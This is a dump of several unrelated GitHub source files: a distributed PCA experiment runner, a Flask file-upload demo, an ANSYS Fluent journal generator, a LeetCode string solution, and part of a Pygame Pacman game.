default=\"mnist\")\nargs = parser.parse_args()\n\n# initialize variables\niterations = 10000\n\nK = args.K # number of eigenvectors to be estimated\n\ngtype = 'erdos-renyi'\np = 0.5 # connectivity for erdos renyi graph\n\nnum_nodes = args.num_nodes # number of nodes\nstep_size = args.stepsize # initial step size for DSA\nstep_sizeg = args.stepsize # initial step size for GHA\nstep_sizep = 1 # initial step size for PGD\nflag = 0 # flag = 0: constant step size, flag = 1: 1/t^0.2, flag = 2: 1/sqrt(t)\n\n# generate graph\ngraphW = GraphType(gtype, num_nodes, p)\nW = graphW.createGraph()\nWW = np.kron(W, np.identity(K))\n\n# import data set\ndataset = args.dataset\ndata = read_dataset.read_data(dataset)\n\n# load EVD output\nwith open(\"Datasets/true_eigenvectors/EV_{}.pickle\".format(dataset), 'rb') as f:\n X1 = pickle.load(f)\nX_gt = X1[:, 0:K]\n\nnp.random.seed(1)\nX_init = np.random.rand(data.shape[0], K)\nX_init, r = np.linalg.qr(X_init)\n\n\ntest_run = Algorithms(data, iterations, K, num_nodes, initial_est=X_init, ground_truth=X_gt)\n\nangle_sanger = test_run.centralized_sanger(step_size, flag)\nangle_oi = test_run.OI()\nangle_dsa = test_run.DSA(WW, step_size, flag)\nangle_seqdistpm = test_run.seqdistPM(W, 50)\nangle_dpgd = test_run.distProjGD(WW, step_sizep, flag)\n\n\nwith open('results/{}_K{}_stepsize{}_stepsizeg{}_stepsizep{}_flag{}_graphtype{}_n{}.pickle'.format(dataset, K, step_size, step_sizeg, step_sizep, flag, gtype, num_nodes), 'wb') as f:\n pickle.dump([angle_dsa, angle_sanger, angle_oi, angle_seqdistpm, angle_dpgd], f)\n","repo_name":"INSPIRE-Lab-US/DSA-Distributed-PCA","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"1412207532","text":"# Flask などの必要なライブラリをインポートする\nimport os\nfrom datetime import datetime\n\nimport werkzeug\nfrom flask import (Flask, jsonify, make_response, redirect, render_template,\n request, url_for, send_from_directory)\n\nimport pandas as pd\nimport numpy as np\nimport settings.messages as msg\nfrom settings.base import *\n\n# 自身の名称を app という名前でインスタンス化する\napp = Flask(__name__)\n# limit upload file size : 1MB\napp.config[\"MAX_CONTENT_LENGTH\"] = 1 * 1024 * 1024\n\n# ここからウェブアプリケーション用のルーティングを記述\n# index にアクセスしたときの処理\n@app.route(\"/\")\ndef index():\n\n # 実際はファイルから取得するリスト\n shohin_list = [\n \"product_1\",\n \"product_2\",\n \"product_3\",\n \"product_4\",\n \"product_5\",\n \"product_6\",\n \"product_7\",\n \"product_8\",\n \"product_9\",\n \"product_10\",\n ]\n\n rank_dict = {\n key_str: zip([rank.lower() for rank in RANK_DICT[key_str]], RANK_DICT[key_str])\n for key_str in RANK_DICT.keys()\n }\n # jinja2の参考にさせていただいた: https://tanuhack.com/jinja2-cheetsheet/\n # index.html をレンダリングする\n return render_template(\"test.html\",\n title=SYSTEM_NAME,\n message=msg.HOWTOUSE,\n rank_dict=rank_dict,\n product_list=shohin_list\n )\n\n# /post にアクセスしたときの処理\n@app.route(\"/result\", methods=[\"GET\", \"POST\"])\ndef return_result():\n if request.method == \"POST\":\n # リクエストフォームから「名前」を取得\n name = request.form.get(\"name\")\n # チェックボックスで選択された項目のリストを取得\n checked_list = request.form.getlist(\"chk_rank\")\n # 選択された商品のリストを取得\n selected_shohin_list = request.form.get(\"txt_shohin_selected\")\n\n # アップロードされたファイルを取得\n if not \"upload_files\" in request.files:\n return make_response(jsonify({\"result':'upload_files not exist.\"}))\n \n files = request.files.getlist(\"upload_files\")\n for f in files:\n saveFileName = datetime.now().strftime(\"%Y%m%d_%H%M%S_\") \\\n + werkzeug.utils.secure_filename(f.filename)\n #saveFileName = datetime.now().strftime(\"%Y%m%d_%H%M%S_\")\n f.save(os.path.join(UPLOAD_DIR, saveFileName))\n print(f\"name: {name}\")\n print(f\"checked_list: {checked_list}\")\n print(f\"selected_shohin_list: {selected_shohin_list}\")\n # index.html をレンダリングする\n # 実際は別処理で取得するテーブル\n df = pd.DataFrame(\n {\n \"product\": np.random.choice(selected_shohin_list.split(\",\"), size=20),\n \"rank\": np.random.choice(RANK_DICT.get(\"a\") + RANK_DICT.get(\"b\"), size=20)\n }\n )\n save_file_name = \"{}.csv\".format(datetime.now().strftime(\"%Y%m%d_%H%M%S_%f\"))\n download_file_name = \"result_\" + save_file_name\n df.to_csv(os.path.join(DOWNLOAD_DIR, save_file_name), index=False)\n #return render_template(\"test.html\", name=name)\n #今回はcsvだが、ExcelのMIMETYPE参考ページ:https://qiita.com/5zm/items/760000cf63b176be544c\n return send_from_directory(\n DOWNLOAD_DIR,\n save_file_name,\n as_attachment = True,\n attachment_filename = download_file_name,\n mimetype = \"text/csv\"\n )\n else:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for(\"result\"))\n\n\nif __name__ == \"__main__\":\n app.debug = True # デバッグモード有効\n # hostはデフォルトでループバックアドレスだが、未来の自分が気にしそうなので明示しておく\n # 本番環境では run を使用しないように注意喚起されている(セキュリティ関連)\n # 公式ドキュメント: https://flask.palletsprojects.com/en/1.0.x/api/\n #app.run(host=\"127.0.0.1\")\n app.run(host=\"0.0.0.0\")\n","repo_name":"miya8/flask_docker_test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1578686414","text":"import numpy as np\nimport os\nimport fluent_tui\n\n\nwhole_jou = ''\nproject_title = 'C095'\nversion_name = 'V1_bil'\ncad_name = 'C095_V1_bil'\nproject_path = r\"G:\\_HAVC_Project\\C095\\C095_03_bi_level\\C095_V1_bil\"\n\n# valve_dir = [0, -1, 0]\n# valve_origin = [5407.69, 869.38, 1022.1]\n# linearity angle setup\ntotal_angle = 90\nstart_angle = 30\npoints = 7\n\n\nangle_array = np.linspace(start_angle, total_angle, points, endpoint=True) # define your angle range and points\n# angle_array = [round(i, 3) for i in angle_array]\nangle_array = [int(i) for i in angle_array]\n\nprint('angle array:', angle_array)\n\njou_out = project_path\njou_title = project_title + '-' + version_name + '-TUI'\ntxt_name = jou_out + '\\\\' + jou_title + '.jou' # txt final path\nprint('output journal in:', txt_name)\njou = open(txt_name, 'w')\n\nCFD = fluent_tui.tui(whole_jou, project_title, version_name, project_path, cad_name)\n# j = 0\n\n\nfor i in angle_array:\n cad_lin_name = '%s_%s' % (cad_name, i)\n\n # rotate_angle = round(angle_array[j] - angle_array[j - 1], 3)\n # j = j + 1\n CFD.mesh.import_distrib(cad_name=cad_lin_name)\n CFD.mesh.general_improve(0.75)\n CFD.mesh.fix_slivers()\n CFD.mesh.compute_volume_region()\n CFD.mesh.volume_mesh_change_type(dead_zone_list=['valve'])\n # CFD.mesh.auto_mesh_volume(1.25)\n CFD.mesh.auto_mesh_volume(1.25, 'tet')\n CFD.mesh.auto_node_move(0.85, 6)\n CFD.mesh.rename_cell(zone_list=['diffuser', 'distrib', 'evap', 'hc'])\n CFD.mesh.retype_face(face_list=['inlet'], face_type='mass-flow-inlet')\n CFD.mesh.retype_face(face_list=['evap*', 'hc*'], face_type='internal')\n # CFD.mesh.retype_face(face_list=['hc*'], face_type='radiator')\n CFD.mesh.retype_face(face_list=['outlet*'], face_type='outlet-vent')\n CFD.mesh.prepare_for_solve()\n CFD.mesh.write_lin_mesh(i)\n\n\nmass_flux_list = ['inlet*', 'outlet*']\n\nevap_d1 = [-0.98163, 0, -0.19081]\nevap_d2 = [0, 1, 0]\nhc_d1 = [-0.87459, 0, -0.48486]\nhc_d2 = [0, 1, 0]\n\nCFD.mesh.switch_to_solver()\nCFD.setup.replace_lin_mesh(start_angle)\n# CFD.setup.read_lin_mesh(start_angle)\nCFD.setup.rescale()\n# CFD.setup.convert_polymesh()\nCFD.setup.turb_models()\n\nCFD.setup.porous_zone('evap', evap_d1, evap_d2, 1.03e+07, 303.49)\nCFD.setup.porous_zone('hc', hc_d1, hc_d2, 5.18e+07, 816.9)\n# CFD.setup.BC_type('inlet', 'pressure-inlet')\nCFD.setup.BC_type('inlet*()', 'mass-flow-inlet')\nCFD.setup.BC_type('outlet*()', 'outlet-vent')\nCFD.setup.solution_method()\n# CFD.setup.energy_eqt('yes')\n# CFD.setup.BC_pressure_inlet('inlet')\n# CFD.setup.init_temperature('mass-flow-inlet', 'outlet-vent', 273.15)\nCFD.setup.BC_mass_flow_inlet('inlet', 0.0735)\n\nCFD.setup.BC_outlet_vent(10.233, 'outlet_vent')\nCFD.setup.BC_outlet_vent(3.363, 'outlet_foot')\n# CFD.setup.BC_outlet_vent(0, 'outlet_sdl')\n# CFD.setup.BC_outlet_vent(0, 'outlet_sdr')\n# CFD.setup.BC_outlet_vent(0, 'outlet_cdl')\n# CFD.setup.BC_outlet_vent(0, 'outlet_cdr')\n# CFD.setup.BC_outlet_vent(0, 'outlet_ffl')\n# CFD.setup.BC_outlet_vent(0, 'outlet_ffr')\n# CFD.setup.BC_outlet_vent(0, 'outlet_rfl')\n# CFD.setup.BC_outlet_vent(0, 'outlet_rfr')\n\n# CFD.setup.heat_flux('hc_out', 348.15)\n# CFD.setup.heat_flux('hc_in', 348.15)\n# CFD.setup.report_definition('temperature', 'surface-areaavg', ['outlet*'], 'yes', 'temperature')\nCFD.setup.report_definition('mass-flux', 'surface-massflowrate', mass_flux_list, 'no')\nCFD.setup.convergence_criterion()\nCFD.setup.hyb_initialize()\nCFD.setup.start_calculate(350)\nCFD.setup.write_lin_case_data(start_angle)\nCFD.post.simple_lin_post(start_angle)\n\nfor i in angle_array[1:]:\n CFD.setup.replace_lin_mesh(i)\n CFD.setup.rescale()\n # CFD.setup.init_temperature('mass-flow-inlet', 'outlet-vent', 273.15)\n CFD.setup.hyb_initialize()\n CFD.setup.start_calculate(350)\n CFD.setup.write_lin_case_data(i)\n CFD.post.simple_lin_post(i)\n # CFD.post.txt_surface_integrals('area-weighted-avg', ['dct*'], 'temperature')\n CFD.post.txt_surface_integrals('volume-flow-rate', ['inlet*', 'outlet*', 'evap*', 'hc*'])\n\njou.write(CFD.whole_jou)\njou.close()\nos.system(txt_name)","repo_name":"qweaxdzsc/fluent_add_on","sub_path":"Python-test/linearity_new.py","file_name":"linearity_new.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"72651777681","text":"'''\nGiven a string, find the first non-repeating character in it and return it's index. If it doesn't exist, return -1.\n\nExamples:\n\ns = \"leetcode\"\nreturn 0.\n\ns = \"loveleetcode\",\nreturn 2.\nNote: You may assume the string contain only lowercase letters.\n'''\n\nclass Solution:\n def firstUniqChar(self, s):\n seen_before=[]\n for i in range(len(s)):\n if s[i] not in s[i+1:] and s[i] not in seen_before:\n return i\n seen_before.append(s[i])\n return -1\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n","repo_name":"dave05/wallbreakers","sub_path":"week2/First Unique Character in a String.py","file_name":"First Unique Character in a String.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42545070230","text":"import pygame\r\nfrom abc import ABCMeta, abstractmethod\r\nimport random\r\nimport time\r\nimport Highscore\r\nimport login\r\n\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((800, 600), 0)\r\npygame.display.set_caption(\"Pacman\")\r\nfont = pygame.font.SysFont(\"arial\", 20, True, False)\r\n\r\n\r\nAMARELO = (255, 255, 0)\r\nPRETO = (0, 0, 0)\r\nAZUL = (0, 0, 255)\r\nVERMELHO = (255, 0, 0)\r\nBRANCO = (255, 255, 255)\r\nLARANJA = (255, 140, 0)\r\nROSA = (255, 15, 192)\r\nCIANO = (0, 255, 255)\r\nVELOCIDADE = 1\r\nACIMA = 1\r\nABAIXO = 2\r\nDIREITA = 3\r\nESQUERDA = 4\r\n\r\nnomeUsuario = ''\r\n\r\nglobal matrizMapa\r\nmatrizMapa = [\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 0, 0, 0, 0, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2]\r\n ]\r\n\r\n\r\nclass ElementoJogo(metaclass=ABCMeta):\r\n @abstractmethod\r\n def pintar(self, tela):\r\n pass\r\n\r\n @abstractmethod\r\n def calcular_regras(self):\r\n pass\r\n\r\n @abstractmethod\r\n def processar_eventos(self, eventos):\r\n pass\r\n\r\n\r\nclass Movivel(metaclass=ABCMeta):\r\n @abstractmethod\r\n def aceitar_movimento(self):\r\n pass\r\n\r\n @abstractmethod\r\n def recusar_movimento(self, direcoes):\r\n pass\r\n\r\n @abstractmethod\r\n def esquina(self, direcoes):\r\n pass\r\n\r\n\r\nclass Cenario(ElementoJogo):\r\n def __init__(self, tamanho, pac):\r\n self.pacman = pac\r\n self.moviveis = []\r\n self.pontos = 0\r\n # Estados possiveis 0-Jogando 1-Pausado 2-GameOver 3-Vitoria\r\n self.estado = 0\r\n self.tamanho = tamanho\r\n self.vidas = 5\r\n self.matriz = matrizMapa\r\n\r\n def adicionar_movivel(self, obj):\r\n self.moviveis.append(obj)\r\n\r\n def pintar_score(self, tela):\r\n pontos_x = self.tamanho * 30\r\n pontos_img = font.render(\"Score {}\".format(self.pontos), True, AMARELO)\r\n vidas_img = font.render(\"Vidas {}\".format(self.vidas), True, AMARELO)\r\n highscore_img = font.render(\"Highscore\", True, AMARELO)\r\n listaTop10 = []\r\n cont = 0\r\n for score in Highscore.top10(\"Pacman\"):\r\n tela.blit(font.render(score[0] + \" \" + score[1] + \" \" + score[2], True, AMARELO), (pontos_x, 150 + 25 * cont))\r\n cont += 1\r\n\r\n scoreUsuario = Highscore.buscaScore(\"Pacman\", nomeUsuario)\r\n if scoreUsuario != []:\r\n tela.blit(font.render(scoreUsuario[0] + \" \" + scoreUsuario[1] + \" \" + scoreUsuario[2], True, AMARELO), (pontos_x, 430))\r\n tela.blit(highscore_img, (pontos_x, 120))\r\n tela.blit(pontos_img, (pontos_x, 50))\r\n tela.blit(vidas_img, (pontos_x, 74))\r\n\r\n def pintar_linha(self, tela, numero_linha, linha):\r\n for numero_coluna, coluna in enumerate(linha):\r\n x = numero_coluna * self.tamanho\r\n y = numero_linha * self.tamanho\r\n half = self.tamanho // 2\r\n cor = PRETO\r\n if coluna == 2:\r\n cor = AZUL\r\n pygame.draw.rect(tela, cor, (x, y, self.tamanho, self.tamanho), 0)\r\n if coluna == 1:\r\n pygame.draw.circle(tela, AMARELO, (x + half, y + half),\r\n self.tamanho // 10, 0)\r\n\r\n def pintar(self, tela):\r\n if self.estado == 0:\r\n self.pintar_jogando(tela)\r\n elif self.estado == 1:\r\n self.pintar_jogando(tela)\r\n self.pintar_pausado(tela)\r\n elif self.estado == 2:\r\n self.pintar_jogando(tela)\r\n self.pintar_gameover(tela)\r\n elif self.estado == 3:\r\n self.pintar_jogando(tela)\r\n self.pintar_vitoria(tela)\r\n\r\n def pintar_texto_centro(self, tela, texto):\r\n texto_img = font.render(texto, True, AMARELO)\r\n texto_x = (tela.get_width() - texto_img.get_width()) // 2\r\n texto_y = (tela.get_height() - texto_img.get_height()) // 2\r\n tela.blit(texto_img, (texto_x, texto_y))\r\n\r\n def pintar_vitoria(self, tela):\r\n self.pintar_texto_centro(tela, \"P A R A B E N S V O C E V E N C E U ! ! !\")\r\n\r\n def pintar_gameover(self, tela):\r\n self.pintar_texto_centro(tela, \"G A M E O V E R\")\r\n\r\n def pintar_pausado(self, tela):\r\n self.pintar_texto_centro(tela, \"P A U S A D Os\")\r\n\r\n def pintar_jogando(self, tela):\r\n for numero_linha, linha in enumerate(self.matriz):\r\n self.pintar_linha(tela, numero_linha, linha)\r\n self.pintar_score(tela)\r\n\r\n def get_direcoes(self, linha, coluna):\r\n direcoes = []\r\n if self.matriz[int(linha - 1)][int(coluna)] != 2:\r\n direcoes.append(ACIMA)\r\n if self.matriz[int(linha + 1)][int(coluna)] != 2:\r\n direcoes.append(ABAIXO)\r\n if self.matriz[int(linha)][int(coluna - 1)] != 2:\r\n direcoes.append(ESQUERDA)\r\n if self.matriz[int(linha)][int(coluna + 1)] != 2:\r\n direcoes.append(DIREITA)\r\n return direcoes\r\n\r\n def calcular_regras(self):\r\n if self.estado == 0:\r\n self.calcular_regras_jogando()\r\n elif self.estado == 1:\r\n self.calcular_regras_pausado()\r\n elif self.estado == 2:\r\n self.calcular_regras_gameover()\r\n\r\n def calcular_regras_gameover(self):\r\n pass\r\n\r\n def calcular_regras_pausado(self):\r\n pass\r\n\r\n def calcular_regras_jogando(self):\r\n for movivel in self.moviveis:\r\n lin = int(movivel.linha)\r\n col = int(movivel.coluna)\r\n lin_intencao = int(movivel.linha_intencao)\r\n col_intencao = int(movivel.coluna_intencao)\r\n direcoes = self.get_direcoes(lin, col)\r\n if len(direcoes) >= 3:\r\n movivel.esquina(direcoes)\r\n if isinstance(movivel, Fantasma) and movivel.linha == self.pacman.linha and \\\r\n movivel.coluna == self.pacman.coluna:\r\n self.vidas -= 1\r\n if self.vidas <= 0:\r\n Highscore.insereScore(\"Pacman\", nomeUsuario, str(self.pontos))\r\n self.estado = 2\r\n else:\r\n self.pacman.linha = 1\r\n self.pacman.coluna = 1\r\n else:\r\n if 0 <= col_intencao < 28 and 0 <= lin_intencao < 29 and \\\r\n self.matriz[lin_intencao][col_intencao] != 2:\r\n movivel.aceitar_movimento()\r\n if isinstance(movivel, Pacman) and self.matriz[lin][col] == 1:\r\n self.pontos += 1\r\n self.matriz[lin][col] = 0\r\n if self.pontos >= 306:\r\n Highscore.insereScore(\"Pacman\", nomeUsuario, str(self.pontos + 100 * self.vidas))\r\n self.estado = 3\r\n else:\r\n movivel.recusar_movimento(direcoes)\r\n\r\n def processar_eventos(self, evts):\r\n for e in evts:\r\n if e.type == pygame.QUIT:\r\n exit()\r\n if e.type == pygame.KEYDOWN:\r\n if e.key == pygame.K_p:\r\n if self.estado == 0:\r\n self.estado = 1\r\n elif self.estado == 1:\r\n self.estado = 0\r\n elif self.estado == 2 or self.estado == 3:\r\n \r\n self.pacman.linha = 1\r\n self.pacman.coluna = 1\r\n self.vidas = 5\r\n self.pontos = 0\r\n self.estado = 0\r\n self.matriz = [\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 0, 0, 0, 0, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2]\r\n ]\r\n \r\n \r\n self.moviveis.pop(4)\r\n self.moviveis.pop(3)\r\n self.moviveis.pop(2)\r\n self.moviveis.pop(1)\r\n gameLoop()\r\n\r\n \r\n \r\n\r\n\r\n\r\nclass Pacman(ElementoJogo, Movivel):\r\n def __init__(self, tamanho):\r\n self.coluna = 1\r\n self.linha = 1\r\n self.centro_x = 400\r\n self.centro_y = 300\r\n self.tamanho = tamanho\r\n self.vel_x = 0\r\n self.vel_y = 0\r\n self.raio = self.tamanho // 2\r\n self.coluna_intencao = self.coluna\r\n self.linha_intencao = self.linha\r\n self.abertura = 0\r\n self.velocidade_abertura = 1\r\n\r\n def calcular_regras(self):\r\n self.coluna_intencao = self.coluna + self.vel_x\r\n self.linha_intencao = self.linha + self.vel_y\r\n self.centro_x = int(self.coluna * self.tamanho + self.raio)\r\n self.centro_y = int(self.linha * self.tamanho + self.raio)\r\n\r\n def pintar(self, tela):\r\n # Desenhar o corpo do Pacman\r\n pygame.draw.circle(tela, AMARELO, (self.centro_x, self.centro_y), self.raio, 0)\r\n\r\n self.abertura += self.velocidade_abertura\r\n if self.abertura > self.raio:\r\n self.velocidade_abertura = -1\r\n if self.abertura <= 0:\r\n self.velocidade_abertura = 1\r\n\r\n # Desenho da boca do Pacman\r\n canto_boca = (self.centro_x, self.centro_y)\r\n labio_superior = (self.centro_x + self.raio, 